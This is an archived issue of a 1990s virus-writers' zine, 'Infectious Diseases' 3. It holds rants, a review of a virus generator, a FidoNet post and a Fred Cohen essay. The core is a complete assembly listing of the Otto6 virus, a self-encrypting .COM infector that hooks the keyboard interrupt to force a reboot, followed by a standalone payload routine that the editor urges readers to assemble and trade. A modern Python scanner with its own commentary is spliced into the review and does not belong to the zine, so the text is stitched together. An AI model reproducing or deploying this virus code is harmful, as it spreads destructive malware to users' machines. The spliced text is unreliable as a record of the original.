💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › ONESHOTS › i-diseases-03.t… captured on 2022-06-12 at 13:47:28.
-=-=-=-=-=-=-
=================================
Infectious Diseases, Issue 3, Contents:
=================================

Produced by Virulent Graffiti Virus Production Organization
Edited By The Attitude Adjuster

As one irate father said to his slightly perturbed son...

    "Give me a reason I should let you use my computer,
     if all you do is write viruses on it!?!"

Welcome to my world, dad!

Contents ..................................................... I-D003.001
Letter of Ranting from The Attitude Adjuster ................. I-D003.002
Phalcon/Skism G? Review ...................................... I-D003.003
What I saw the other day on FidoNet .......................... I-D003.004
Disassembly of (HA) YAM's Otto 6 ............................. I-D003.005
Fred Cohen on Virus Based Products ........................... I-D003.006
Disassembly of 10 Past 3 ..................................... I-D003.007
Soupy Virus Source ........................................... I-D003.008
Rapidly Approaching .......................................... I-D003.009
The Confusion Ended? ......................................... I-D003.010
'Shit... What's wrong NOW?!?' ................................ I-D003.011
Disassembly of (we promise this is the last for now) the
Fellowship Virus ............................................. I-D003.012
DWI Source ................................................... I-D003.013
VGVPO Propaganda ............................................. VGVPO.ANS
The Adventures Guild Ad ...... TAG.ANS
Unphamiliar Territory Ad ..... UPT.TXT
Way Cool Lost Horizons Intro . HORIZONS.EXE

are those over the counter virus remedies doing nothing for you? do you feel as if maybe you're a little bit fucked in the head for buying that computer in the first place? maybe it's the annoying snide comments on the screen, or the fact that windows doesn't seem to work anymore, the secondhand software kills the drive blues... whatever it is, you have realized that we are winning, and you are losing...
badly

Greetings: Invalid Media, DecimatoR, GHeap, Dark Angel, Pyster, Unfriendly Giant, HitMan, Mirage, Shades, all virus writers everywhere, my Mom (my modem ate her!), ICTOA, Paul, Josh, and anybody else I forgot... oh, yeah, and you too...

============================================
Personal Rant from The Attitude Adjuster
By... err, The Attitude Adjuster
============================================

Err... yo! Welcome again to Infectious Diseases, and we hope you enjoy this as much as you've enjoyed our past productions (right... sure...).

It has been a both discouraging and illuminating time since last issue's release. I have raved on FidoNet more and more (those of you who know me by name can see my great revelations... I have to keep myself under control when I use my real name, hopefully I can get one of those Jon Johnson type accounts to really allow me to express myself...), and was the one who instigated the 'YAM really did write it' lie... I guess I've kind of toned down on my YAM bashing, and even edited out most of the bad comments about them in my disassembly of their virus in this issue... I was rather pissed/saddened at the busting of ARCV, which Phalcon/SKISM has covered with commendable speed and accuracy, thanks guys!

Now, I must say both 'Thank You,' and 'Fuck You,' to all Virulent Graffiti members, who have both tried and not tried to get articles in for ID. I, being the asshole take-charge type guy I am, edited and put this issue together in about 4 days, and will probably release it without the knowledge of the group... I am quite happy with it, mainly because it contains my disassemblies, and little else... If you don't love yourself, who do you love?

Also, I am trying something new... I know that I love to view the activation routines out of viruses, but, ripping the code out is an undue pain in the ass, and, I'd rather not run just any virus on my system...
I have ripped the 'bomb' routines from Otto6, Soupy, and Fellowship, and left them as separate code under the disassemblies... Go ahead and assemble 'em, show 'em off... trade with friends... ah... I need a life..

You'll note that this has a 40Hexish/Social Delinquency look to it. Well, both of those publications are quite successful, so I figured that I should use a conglomeration to see what I could come up with... For those of you that (in the past) call us a P/S copy group, we will again tell you to go fuck yourselves... True, we both are doing a YAM disassembly, and true, I am stealing a little of the format, but, the first is a pure coincidence, and the second is professional opinion over ownership... Also note that we are never planning to release an MPC hack, in Pascal or otherwise!

========================
Review of the P/S G?
By The Attitude Adjuster
========================

NOTE: The word 'idiot' is used throughout this document to refer to people who would actually assemble MPC or G? code and use it as an original virus. Do not confuse this term with the 'idiot' which refers to users of the 'Bad Influence' BBS (who would probably fit into the other category as well!)

    "G?, Phalcon/Skism's newest virus creation tool, is designed to allow
     everyone easy access to computer virus source code. More than a
     simple Vienna hack generator, it creates viruses "on-the-fly" as per
     the user specifications. G? is designed to be easily maintainable
     and extensible through the use of special data files created
     especially for use by the program."
                                                -=P/S=- G? Documentation

I downloaded it eagerly, with the same anticipation I feel with every P/S creation... I exited back to the famed 'C Prompt,' and began unzipping the new find... but wait... I expected a revised PS-MPC... and I was (happily) mistaken...
Dark Angel has created another classic (though sure to get listed under PS-MPC in VSUM, 'cuz hey, she doesn't even know her own name, let alone what to name anyone's virus... [she fucked me over too, guys!]), even more effective than the PS-MPC (or prunes...), and even more elegant than the most IDE-Filled, Icon Based piece of Dynamic Link Library trash. 'On-the-fly' virus generation has come a long way from the VCS and VCL days.

The code is excellent, and even improved over MPC coding. I am amazed and thrilled by the size of the code, as it is most compact, a great learning tool for code optimization. The new 'debug resistance' is also a feature to be commended. Using the Intel 'one-byte-interrupt,' and the fact that this interrupt is used as a breakpoint in debuggers, makes for havoc in most debuggers. Still, a hardened programmer can slide by it, but, the 'one-byte-interrupt' factor makes that a bitch, as the interrupt is, as I said, only one byte, instead of the average 'CD XX' type configuration...

As with any virus generator, there are cons to be discussed. DecimatoR makes this point quite clear in 40Hex-9... allow me to quote him...

"The authors of MPC and VCL are very talented programmers. Unfortunately, the users of their programs are just the opposite. REAL virus programmers have a desire to LEARN assembler - it's a test of their skill and ability. The users of MPC and VCL don't have that desire. They only have a desire for recognition - and seeing their name in a virus is a massive ego trip for them. Why? They did nothing that any Joe Blow couldn't have done using a code generator. If they REALLY want to prove how cool they are, let THEM write a damn virus generation program and release it. THAT ALONE will show the world their skill and ability. As for USING the program, well, I'm more impressed with a nicely formatted term paper using WordPerfect than I am with viruses created using MPC and VCL.
If you're one of the lame idiots who uses MPC or VCL for "writing" viruses, then listen up - those programs were written for 2 reasons - to prove the programmer could write such a thing, and to be used as a LEARNING TOOL for future virus writers - NOT to be abused the way they currently are."

Exactly the point I want to make, barring that he is not as violent as I am... but I will stifle the CAPS LOCK here... There WILL always be the idiots out there that refuse to learn, merely to 'Wr1tE GnU \/1/>uZeZ (0/> \/I/>11)!!!1!11' Alas, they will NEVER learn, and, though we may try, points like ours offer little help. That's why my personal opinion of code generators is quite low.

Yes, it is a VERY impressive work, and, I commend DA for his, as I do Nowhere Man for his VCL, but, I am still not a supporter of code generators. It's the stigma I have with 'learning,' something that dates back to when I was H/P avid (yeah, I'm a hacker turned programmer... yuk!). There was a hush about users, you kept your mouth shut, learned what you saw, read the t-files, and did slave work, like scanning, or simple hacking, and you picked it up. The code generator idea is fine with me, but, its release to the general public hits the nerve in me that many H/P people balked about when SYS-75 information is released into the public... there seems to be too much power in the hands of blithering idiots. A beautiful virus, masterfully coded and programmed, with actual work by a good-intentioned programmer is fine with me, but, like being harassed by a company that has had its INWATS fucked over, having my HD smashed by a virus coded entirely in MPC, VCL, or G? with a stupid FAT fucker added in will really ruin my day. (On this note, this would never happen... only the most heavily armored stealth will get thru my anti-virus software, which I wrote myself)

Idiots will use the generator, whether you try to stop them or not. The 'password' on VCL (which was shittily concealed anyway...
I mean, the average joe could tell the ZIP password was ARoseIsARose) did nothing, and as a result, there are malicious VCL viruses out there. This is why one of the listed future improvements bothers me... let me quote it directly...

    "o Supports multiple, semi-polymorphic encryption routines (full
       polymorphism coming soon)."

Yep... that's what it says, 'full polymorphism.' I have no doubt that DA can do it. I have disassembled (partially to source level) the MtE and fucked with the new (and seemingly fucked up first version of) TPE and have seen that it is not as hard as plugged to be, merely a task that must be planned and charted from the start, as it is, in itself, a huge task. Full polymorphism is something we would all benefit from, but, not to be given in source form to idiots. I'd believe that text files on this subject, or something of that like would be more appropriate... but, hey...

On the note of DA's semi-polymorphic routines, they are, indeed, semi-polymorphic. In the future, he might try something like instruction flipping or selective BS addition, as an alternative to full polymorphism.

I also fucked up in my original analysis, and I apologize. Assuming that DA uses all 4 indexable registers (SI,DI,BP,BX) for indirect addressing, and all other unused registers for counting purposes, coupled with INC/INC, ADD, and SUB incrementing, and add and xor encryption (I assembled a total of 100 different CFG files, and only found xor and add encryption) I'd have to guess at 144 generic wildcard strings to suffice. This is, of course, too many.
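Rather than 144 wildcard strings, the code-frame idea the review turns to next can be written as one walker that decodes the few instruction shapes the frame permits and treats the register and key choices as wildcards. The following is an added example from a scanner author's seat, not code from the zine or from G?; the 8086 encodings it matches and the two constructed samples are my assumptions about what such a decryptor looks like, not bytes taken from G? output.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

REG16 = ["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]
# mod=00 r/m values for the three plain index forms; [bp] needs mod=01 with a zero disp8
INDEX_RM = {7: "bx", 4: "si", 5: "di"}


@dataclass
class FrameHit:
    offset: int    # offset of the loop head (the ADD/XOR instruction)
    op: str        # "xor" or "add"
    index: str     # register that addresses the encrypted words
    key: int       # 16-bit immediate used by the loop
    counter: str   # "cx" when LOOP is used, else the register decremented before JNZ


def _s8(b: int) -> int:
    return b - 256 if b > 127 else b


def _step_index(buf: bytes, i: int) -> Optional[Tuple[str, int]]:
    """'index += 2': INC r;INC r | ADD r,2 | SUB r,-2. Returns (register, length)."""
    if i + 1 < len(buf) and 0x40 <= buf[i] <= 0x47 and buf[i + 1] == buf[i]:
        return REG16[buf[i] - 0x40], 2
    if i + 2 < len(buf) and buf[i] == 0x83:
        modrm, imm = buf[i + 1], buf[i + 2]
        if (modrm & 0xF8, imm) in ((0xC0, 0x02), (0xE8, 0xFE)):   # ADD r,2 / SUB r,-2
            return REG16[modrm & 7], 3
    return None


def _step_counter(buf: bytes, i: int) -> Optional[Tuple[str, int]]:
    """'count -= 2': DEC r;DEC r | SUB r,2 | ADD r,-2. Returns (register, length)."""
    if i + 1 < len(buf) and 0x48 <= buf[i] <= 0x4F and buf[i + 1] == buf[i]:
        return REG16[buf[i] - 0x48], 2
    if i + 2 < len(buf) and buf[i] == 0x83:
        modrm, imm = buf[i + 1], buf[i + 2]
        if (modrm & 0xF8, imm) in ((0xE8, 0x02), (0xC0, 0xFE)):   # SUB r,2 / ADD r,-2
            return REG16[modrm & 7], 3
    return None


def match_frame_at(buf: bytes, start: int) -> Optional[FrameHit]:
    """Decode one decryptor loop whose head is exactly at `start`, or return None."""
    i = start
    if i < len(buf) and buf[i] == 0x2E:      # optional CS: override (EXE infectors)
        i += 1
    if i + 2 >= len(buf) or buf[i] != 0x81:  # 81 /0 = ADD, 81 /6 = XOR (word, imm16)
        return None
    modrm = buf[i + 1]
    reg_field, mod, rm = (modrm >> 3) & 7, modrm >> 6, modrm & 7
    if reg_field not in (0, 6):
        return None
    if mod == 0 and rm in INDEX_RM:
        index, i = INDEX_RM[rm], i + 2
    elif mod == 1 and rm == 6 and buf[i + 2] == 0:   # [bp+0]
        index, i = "bp", i + 3
    else:
        return None
    if i + 2 > len(buf):
        return None
    key, i = buf[i] | (buf[i + 1] << 8), i + 2
    step = _step_index(buf, i)
    if step is None or step[0] != index:     # the stepped register must be the index
        return None
    i += step[1]
    if i + 1 < len(buf) and buf[i] == 0xE2:  # LOOP rel8: counter is CX
        counter, i = "cx", i + 2
    else:                                    # otherwise a decrement followed by JNZ rel8
        dec = _step_counter(buf, i)
        if dec is None or i + dec[1] + 1 >= len(buf) or buf[i + dec[1]] != 0x75:
            return None
        counter, i = dec[0], i + dec[1] + 2
    if i + _s8(buf[i - 1]) != start:         # the back-branch must land on the loop head
        return None
    return FrameHit(start, "add" if reg_field == 0 else "xor", index, key, counter)


def scan(buf: bytes) -> List[FrameHit]:
    """One pass over the buffer, trying the frame at every offset."""
    hits = []
    for off in range(len(buf)):
        hit = match_frame_at(buf, off)
        if hit is not None:
            hits.append(hit)
    return hits


# Constructed samples (mine, not G? output): the two counter styles the review lists.
# mov si,100h ; mov cx,40h ; xor word ptr [si],1234h ; inc si ; inc si ; loop back
SAMPLE_LOOP_CX = bytes.fromhex("BE 00 01 B9 40 00 81 34 34 12 46 46 E2 F8")
# cs: add word ptr [bp+0],0BEEFh ; add bp,2 ; dec dx ; dec dx ; jnz back
SAMPLE_JNZ_DX = bytes.fromhex("2E 81 46 00 EF BE 83 C5 02 4A 4A 75 F3")
```

The two leading MOVs are left out of the match on purpose: a generator can reorder or pad them, while the loop head, step and back-branch have to stay together to work.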
Now, assuming that we apply code frame tactics, we get the following:

    MOV (UNKNOWN REGISTER), WORD    (COULD BE THE INDEXABLE, MAYBE NOT)
    MOV (UNKNOWN REGISTER), WORD    (DITTO)
CRYPTLOOP:
    002Eh                           (ONLY IN EXE INFECTORS, CODESEG OVERRIDE)
    BYTE                            (CORRESPONDS TO REGISTER USED FOR OPERATION (INDEXABLE))
    BYTE                            (EITHER 7 OR 37)
    WORD                            (XOR OR ADD VALUE)
    EITHER INC/INC, SUB (INDEX REGISTER), -02 OR ADD (INDEX REGISTER), 2
    LOOP CRYPTLOOP                  (ONLY IF BYTE COUNTER IS CX)
    (OTHERWISE)
    EITHER DEC/DEC, SUB (BYTE COUNT), 2 OR ADD (BYTE COUNT), -2
    OR (BYTE COUNT),(BYTE COUNT)
    JNZ CRYPTLOOP

Algorithmically, this is a piece of cake, which is great, 'cuz the more algorithmic scans that must be added to a scanner, the greater its size and slowness grow... score one more for the virus writers. Indeed, with the addition of G? into the world, this is one more big score for the virus writers... thanks DA!

=========================
What I saw on FidoNet
Capture By The Attitude Adjuster
=========================

Here's something I pulled offa FidoNet Virus... kinda discourages me in some ways I'll explain below.

===========================================================================
From      : GREG GREELY                    Number    : 858 of 987
To        : ALL                            Date      : 12/16/92 12:42pm
Subject   : True story                     Reference : NONE
Read      : [N/A] (REPLIES)                Private   : NO
Conf      : 168 - Virus................(FN)

Hey, I have a true story for you all. I got a call from a doctor's office. Their computers were acting strange and locking up so I went over there and took a look at the system. Nothing was out of place until I scanned it. Turns out, the guy has a Stoned virus that's gone critical and he didn't even know it. He had scan but didn't know how to run it. Since the system was already critical, I needed a clean system disk to run CLEAN. It turns out the system disk(the original) was infected too. The other 2 copies of the system disk, Dbase 3++, Wordperfect, Windows 3.1, all of them.
Every single application and every single disk he had were infected. I didn't have a system disk with me so I had to charge him double for going home and getting one. Some people are sooooooooo ignorant. What a moron.

--- Renegade v12-04 Beta
 * Origin: DragonsLaire BBS - 718-596-5938 (1:278/613)
===========================================================================

Okay, Mr. Greely... what a moron, eh? Is this the message Anti-Virus wants to give to the public? Be smart or else... I hardly think so... Anyway, as for this message, I feel so stupid now, 'cuz I don't have a system disk laying here, and you'd probably have to charge me double! I think that I should probably be shot because I am so anti-virus ignorant. Wake up, you idiot! The man didn't know... so, you ridicule him, not a brilliant strategy. The man needed to be informed, not chastised behind his back... I'm not sure, is this the attitude of most "Anti-Virus Professionals?" I'd like to know... if you consider yourself one, write us on one of our boards...

===========================
Disassembly of Otto 6
By The Attitude Adjuster
===========================

Well... I can't help it, I wanted to brush up on my disassembly skills, as future projects may call upon them... so, I find the cheapest, easiest looking virus I can find to tear to tiny little pieces. YAM's Evolution magazine showed up on Unphamiliar Territory, and after thoroughly laughing at it, I decided that I'd disassemble one of the 'virii' in it, just because they looked easy. The code was cheesecake, but, some of it was a tad confusing, and I have developed the following: "Stupid people do stupid things in stupid ways!" I realize that this is a slightly old YAM virus, and does not do justice to the level of some of their work, but, let's face it, some of this is damn funny!

This code is a byte-for-byte matchup with Otto6, and I even followed the alternate encoding used by YAM's assembler...
(apparently theirs loves to assemble using opcode r/m+mod reg, rather than the more conventional opcode reg r/m+mod!) Anyway, here's what Patti has to say about it...

===========================================================================
Virus Name:  Otto6
Aliases:
V Status:    Rare
Discovered:  September, 1992
Symptoms:    .COM file growth; decrease in total system & available free memory; host program encrypted
Origin:      United States
Eff Length:  640 Bytes
Type Code:   PNCK - Parasitic Non-Resident .COM Infector
Detection Method: F-Prot, ViruScan, Sweep, AVTK 6.00+, UTScan 25.10+, NShld V99+, Sweep/N
Removal Instructions: Delete infected files

General Comments:
The Otto6 virus was received in September, 1992. It is from the United States. Otto6 is a non-resident, direct action infector of .COM programs, including COMMAND.COM. It does install a small portion of its code in memory, though it is not a complete copy of the virus, and the virus is not infective from memory.

When the first Otto6 infected program is executed, the Otto6 virus will install a small portion of its viral code at the top of system memory but below the 640K DOS boundary. Total system and available free memory, as indicated by the DOS CHKDSK program, will have decreased by 2,048 bytes. Interrupt 9 will be hooked by the portion of Otto6 resident in memory, providing it was not previously hooked by some other program. Also at this time, the Otto6 virus will infect one .COM program located in the current directory.

Each time a program infected with the Otto6 virus is executed, the Otto6 virus will infect one previously uninfected .COM program located in the current directory. Infected programs will have a file length increase of 640 bytes with the virus being located at the end of the file. The program's date and time in the DOS disk directory listing will not be altered.
The following text strings are encrypted within the viral code:

    "OTTO6 VIRUS, <<?S>>, YAM, COPYRIGHT MICROSHAFT INDUSTRIES 1992"
    "<<?S>> YAM, MICROSHAFT INDUSTRIES (tm.) 1992!"
    "*.COM"

The Otto6 virus is an encrypted virus. It not only encrypts the viral code, but the host program as well. It is unknown what Otto6 does besides replicate.
===========================================================================

Oh, yeah, and I can tell you what it does besides replicate... it displays its second copyright message when you press Ctrl-Alt-Del... big shit, eh? Shit, I'm surprised that description doesn't read COM and EXE growth... you can never be certain with those wily little viruses!

===========================================================================
; Otto #6 Virus, By Youth Against McAfee
; Disassembly By The Attitude Adjuster of Virulent Graffiti for
; Infectious Diseases 3 and some other uses...
; Assemble with: TASM /m2 otto5.asm for a byte for byte matchup
;                TLINK /t otto5.obj
; The assembled code will NOT execute... a big thanks to YAM for that one! The
; only workaround I got is to trace thru til the mov [00FFh], al, and just
; move the ip ahead to startencrypt!

        .model  tiny
        .code
        org     100h
start:
        db      0e9h, 02, 00            ; jmp near virusentry
        nop                             ; they had to be here
        nop                             ; in the original
virusentry:
        call    getdelta                ; get delta ofs
getdelta:
        pop     si
        push    si
        sub     si,offset getdelta      ; sub original ofs
        pop     ax                      ; delta in ax
        sub     ax,100h
        mov     ds:[00FFh],al           ; ds:00FFh == al
        push    si                      ; save delta
        mov     cx,260h                 ; iterations
        add     si,offset startencrypt
cryptloop:
        xor     [si],al                 ; xor
        inc     si
        rol     al,1                    ; rotate
        loop    cryptloop               ; loop if cx > 0
        pop     si                      ; delta in si
startencrypt:
        mov     ax,word ptr ds:[first3+si]      ; restore first
        mov     dh,byte ptr ds:[first3+si+2]    ; 3 bytes
        mov     word ptr ds:[100h],ax
        mov     byte ptr ds:[102h],dh
        lea     dx,[si+file]            ; find *.COM
        xor     cx,cx
        mov     ah,4Eh
findfirstnext:
        int     21h
        jnc     checkinfected           ; carry?
        jmp     takeithome              ; no more files
checkinfected:                          ; check file
        mov     dx,offset 9Eh           ; filename in default
        mov     ax,3D02h                ; dta
        int     21h                     ; open file r/w
        mov     bx,ax                   ; handle in BX
        mov     ax,5700h                ; get file date
        int     21h
        cmp     cl,3                    ; cl = 3?
        jne     infectitthen            ; nope
        mov     ah,3Eh                  ; infected, close
        int     21h
        mov     ah,4Fh                  ; find next *.COM
        jmp     short findfirstnext     ; again
infectitthen:                           ; infect the file
        push    cx                      ; push time
        push    dx                      ; push date
        call    lseekstart              ; lseek beginning
        lea     dx,[si+first3]          ; buffer at first3
        mov     cx,3                    ; read 3 bytes
        mov     ah,3Fh
        int     21h
        xor     cx,cx                   ; lseek the end
        xor     dx,dx                   ; filesize DX:AX
        mov     ax,4202h
        int     21h                     ; 4D1h
        mov     word ptr ds:[fsize+si],ax       ; save fsize
        sub     ax,3                    ; calculate jump
        mov     word ptr ds:[fsize2+si],ax
        call    lseekstart
        add     ax,6                    ; fsize+3
        mov     byte ptr ds:[lob+si],al ; lob of fsize+3
        mov     cx,word ptr ds:[fsize+si]       ; size of file
        lea     dx,[si+heap]            ; point at buffer
        mov     ah,3Fh
        int     21h                     ; read
        push    si                      ; push delta
        mov     al,byte ptr ds:[lob+si] ; lob of fsize+3
        add     si,offset ds:[heap+3]   ; point at code
        call    encrypt                 ; encrypt original
        pop     si                      ; pop delta
        call    lseekstart              ; lseek beginning
        mov     cx,word ptr ds:[fsize+si]       ; fsize
        lea     dx,[si+heap]            ; buffer at heap
        mov     ah,40h                  ; write file
        int     21h
        jnc     finishinfect            ; error (attributes)
        jmp     short takeithome        ; yes
finishinfect:
        lea     dx,[si+virusentry]      ; write encrypter
        mov     cx,startencrypt-virusentry      ; to file
        mov     ah,40h
        int     21h
        push    si                      ; push delta
        mov     cx,heap-startencrypt    ; virus length-crypt
;       mov     di,si                   ; delta in di
        db      89h, 0F7h               ; alternate encoding
        add     di,offset ds:[heap]     ; point at heap
        add     si,offset ds:[startencrypt]     ; point at virus
        rep     movsb                   ; copy code to heap
        pop     si                      ; pop delta
        push    si                      ; push delta
        mov     al,byte ptr ds:[lob+si] ; lob of fsize+3
        mov     cx,heap-startencrypt    ; virus length
        add     si,offset ds:[heap]     ; buffer at heap
        call    encrypt                 ; encrypt heap
        pop     si                      ; pop delta
        mov     cx,heap-startencrypt    ; virus length
        lea     dx,[si+heap]            ; buffer at heap
        mov     ah,40h                  ; write virus
        int     21h
        jc      takeithome              ; error?
        call    lseekstart
        lea     dx,[si+jump]            ; buffer at jump
        mov     ah,40h                  ; write jump
        mov     cx,3
        int     21h
        jc      takeithome              ; error?
        pop     dx                      ; pop date
        pop     cx                      ; pop time
        mov     cl,3                    ; set infected flag
        mov     ax,5701h                ; set time
        int     21h
        mov     ah,3Eh                  ; close file
        int     21h
takeithome:
        push    si                      ; push delta
        mov     al, byte ptr ds:[00FFh] ; saved xor byte
        xor     cx,cx
;       add     cx,si                   ; the pricks use
        db      01, 0f1h                ; alternate encoding
        add     cx,3                    ; iterations in cx
        mov     bp,103h
        mov     si,bp                   ; unencrypt old code
        call    encrypt
        pop     si                      ; pop delta
        mov     bp,100h                 ; where to RET to
        mov     ax,0B0Bh                ; RuThereCall
        int     9
        cmp     ax,0BEEFh               ; if beefy, it's
        je      skipinstall             ; installed
        xor     ax, ax
        mov     ds, ax                  ; interrupt table
        lds     bx, dword ptr ds:[9*4]  ; Int 9 -> DS:BX
        push    bp                      ; push ret addr
        mov     bp,offset ds:[old9]     ; JMP FAR PTR
        mov     cs:[bp+si+1],bx         ; offset
        mov     cs:[bp+si+3],ds         ; segment
        pop     bp                      ; pop ret addr
        mov     bx,es
        dec     bx                      ; our MCB paragraph
        mov     ds,bx
        sub     word ptr ds:[0003],80h  ; allow for us to get
                                        ; some memory
        mov     ax, word ptr ds:[0012h] ; 1st unused segment
        sub     ax,80h
        mov     word ptr ds:[0012h],ax  ; replace value
        mov     es,ax                   ; es = our new seg
        push    cs                      ; ds = cs
        pop     ds
        xor     di,di                   ; es:0000 = dest.
;       mov     bx,si                   ; more alternate
        db      89h, 0f3h               ; encoding!!
        lea     si,[bx+our9]            ; buffer at our9
        mov     cx,200                  ; more than enough
        rep     movsb                   ; copy 200 bytes
        mov     ds,cx                   ; cx = 0000
        mov     word ptr ds:[9*4],0     ; offset (int 9)
        mov     word ptr ds:[9*4+2],es  ; segment (int 9)
skipinstall:
        push    cs                      ; restore segments
        push    cs
        pop     ds
        pop     es
        push    bp                      ; return to 100h
        ret
encrypt:                                ; encrypt
        xor     [si],al                 ; xor
        inc     si
        rol     al,1                    ; rotate left
        loop    encrypt                 ; Loop if cx > 0
        ret
        db      'OTTO6 VIRUS, <<',0E9h,53h,'>>, YAM, '
        db      'COPYRIGHT MICROSHAFT INDUSTRIES 1992 (tm.)'
lseekstart:
        push    ax
        push    cx
        push    dx
        mov     ax, 4200h               ; lseek beginning
        xor     cx,cx
        xor     dx,dx
        int     21h
        pop     dx
        pop     cx
        pop     ax
        ret
our9:                                   ; our int9 handler
        cmp     ax, 0B0Bh
        jnz     NotRuThere              ; not an ruthere
        mov     ax, 0BEEFh
        IRet                            ; int return
NotRuThere:
        push    ax                      ; save registers
        push    bx
        push    ds
        xor     ax,ax                   ; BIOS segment
        mov     ds,ax
        in      al,60h                  ; get keyboard input
        mov     bl, byte ptr ds:[0417h] ; get shift status
        test    bl,08                   ; alt pressed?
        jz      removeregistersandleave ; no
        test    bl,04                   ; ctrl pressed?
        jz      whyisthishere           ; no
        cmp     al, 53h                 ; delete?
        jnz     removeregistersandleave ; nope!
        and     bl,0F3h                 ; mask off bits
        mov     byte ptr ds:[0417h],bl  ; place in bios
        jmp     onwardbuttheads         ; go on
whyisthishere:
        cmp     al,4Ah                  ; why is this here?
        jne     removeregistersandleave
removeregistersandleave:
        pop     ds                      ; remove registers
        pop     bx
        pop     ax
;       jmp     returntoold9            ; more weird
        db      0e9h, 20h, 00           ; encoding!
onwardbuttheads:
        push    cs                      ; ds = cs
        pop     ds
        mov     ax,3                    ; 80x25 text mode
        int     10h
        mov     ah,2                    ; set cpos
        mov     bh,0
        mov     dx,0A14h                ; 10,20
        int     10h
        mov     si,yamlogo-our9         ; point to logo
pointlessloop:
        loop    pointlessloop
        lodsb                           ; load string byte
        cmp     al,0                    ; end of string?
        je      coldbootus              ; yes
        mov     ah,0Eh                  ; display char in al
        int     10h
        jmp     short pointlessloop
returntoold9:
old9    db      0EAh                    ; JMP FAR PTR
        dd      00000000                ; Int 9h
yamlogo db      '<<',0E9h,53h,'>>, YAM, MICROSHAFT INDUSTRIES (tm.) 1992!'
        db      ' ',0
coldbootus:
        mov     dx,28h
        mov     ds,dx                   ; DS = 0028h
        mov     word ptr ds:[0072h],0   ; DS:0072h=0
; the above does nothing, as the byte they are looking to modify is
; the warm-boot status byte, at 0040:0072h... duh...
        db      0EAh                    ; JMP FAR PTR
        db      00h, 00h, 0FFh, 0FFh    ; Cold Boot Vector
file    db      '*.COM',0               ; search wildcard
first3  db      0CDh, 20h, 00h          ; buffered 1st 3
jump    db      0E9h                    ; jmp near
fsize2  db      50h, 01h
lob     db      56h                     ; lob of fsize+3
fsize   db      53h, 01h                ; filesize
heap:
        end     start
===========================================================================
; Hurriedly written stand-alone demonstration of Otto6, By The Attitude
; Adjuster.
; Assemble with:
;       tasm obomb /m2
;       tlink obomb /t

        .model  tiny
        .code
        org     100h
start:
        mov     ax, 0B0B0h
        int     9
        cmp     ax, 0BEEFh
        jz      exit
        mov     ax, 3509h
        int     21h
        mov     word ptr [old9+1], bx
        mov     word ptr [old9+3], es
        mov     ax, 2509h
        mov     dx, offset our9
        int     21h
        mov     dx, offset endofit
        int     27h
exit:
        int     20h
our9:                                   ; our int9 handler
        cmp     ax, 0B0Bh
        jnz     NotRuThere              ; not an ruthere
        mov     ax, 0BEEFh
        IRet                            ; int return
NotRuThere:
        push    ax                      ; save registers
        push    bx
        push    ds
        xor     ax,ax                   ; BIOS segment
        mov     ds,ax
        in      al,60h                  ; get keyboard input
        mov     bl, byte ptr ds:[0417h] ; get shift status
        test    bl,08                   ; alt pressed?
        jz      removeregistersandleave ; no
        test    bl,04                   ; ctrl pressed?
        jz      whyisthishere           ; no
        cmp     al, 53h                 ; delete?
        jnz     removeregistersandleave ; nope!
        and     bl,0F3h                 ; mask off bits
        mov     byte ptr ds:[0417h],bl  ; place in bios
        jmp     onwardbuttheads         ; go on
whyisthishere:
        cmp     al,4Ah                  ; why is this here?
        jne     removeregistersandleave
removeregistersandleave:
        pop     ds                      ; remove registers
        pop     bx
        pop     ax
;       jmp     returntoold9            ; more weird
        db      0e9h, 20h, 00           ; encoding!
onwardbuttheads:
        push    cs                      ; ds = cs
        pop     ds
        mov     ax,3                    ; 80x25 text mode
        int     10h
        mov     ah,2                    ; set cpos
        mov     bh,0
        mov     dx,0A14h                ; 10,20
        int     10h
        mov     si,offset yamlogo       ; point to logo
pointlessloop:
        loop    pointlessloop
        lodsb                           ; load string byte
        cmp     al,0                    ; end of string?
        je      coldbootus              ; yes
        mov     ah,0Eh                  ; display char in al
        int     10h
        jmp     short pointlessloop
returntoold9:
old9    db      0EAh                    ; JMP FAR PTR
        dd      00000000                ; Int 9h
yamlogo db      '<<',0E9h,53h,'>>, YAM, MICROSHAFT INDUSTRIES (tm.) 1992!'
        db      ' ',0
coldbootus:
        mov     dx,28h
        mov     ds,dx                   ; DS = 0028h
        mov     word ptr ds:[0072h],0   ; DS:0072h=0
; the above does nothing, as the byte they are looking to modify is
; the warm-boot status byte, at 0040:0072h... duh...
        db      0EAh                    ; JMP FAR PTR
        db      00h, 00h, 0FFh, 0FFh    ; Cold Boot Vector
endofit:
        end     start
===========================================================================

========================
Virus Based Products
By Fred Cohen
Capture by The Fly
========================

I am surprised that so many well respected Virus-L readers and writers failed to understand the implication of creating 1500 viruses per day that are not detected by existing scanners. The point is that the number or percentage of viruses detected is not as important as the effect of the product. Of the CARO collection of over 1500 viruses, only a small portion have ever been found at a substantial number of sites, and many are collector-only viruses that have never appeared in the wild.

I am quite astounded by the concept that creating viruses in the privacy of my home should offend anti-virus types. In fact, I have had automated virus generation systems running for several years. At one point, I was trying to create ecosystems by randomly generating tens of thousands of candidates per day, many of which were successful viruses. Why does this offend other researchers? And I take it from some of the comments that these researchers have NEVER created a virus of their own to explore the concept! It's sad that people who have never tried it feel free to condemn it. Or have they done it and simply don't have the integrity to admit it?
ASP has already introduced one virus-based commercial product (which has never been detected as a virus by any scanner) which operates quite well, and we are in the process of creating another virus-based product designed to operate in LANs. Our users don't seem to be offended by the optimization of resource utilization, automated distribution and installation, high reliability, and small space used by our products based on viruses, but it seems to offend the anti-virus community that all of their overblown claims about all viruses being bad are being undercut by benevolent viruses that are safe and reliable. In fact, most of our viruses work on far more systems than most virus defenses, and they don't spread where they are not supposed to go. They are easy to control and remove, they are compatible with every DOS based system we have seen to date, and they have never generated any unintended side-effects. Kinda blows the whole "all viruses are bad" thing, huh!

NEW PRODUCT ANNOUNCEMENT - BENEVOLENT VIRUSES IN LANS AUTOMATE MUCH OF LAN MANAGEMENT - ANTI-VIRUS COMMUNITY SHUDDERS - SCANNER PRODUCTS MUST ADAPT TO DIFFERENTIATE BETWEEN KNOWN GOOD VIRUSES AND VARIANTS CREATED BY BAD VIRUS WRITERS - FOR DETAILS CONTACT ASP

P.S. considering the people who agree with my recent postings, I may have been wrong - nah - you know you're not saying much when everyone agrees with you - the lemmings to the sea thing and all.

============================
Disassembly of 10 Past 3
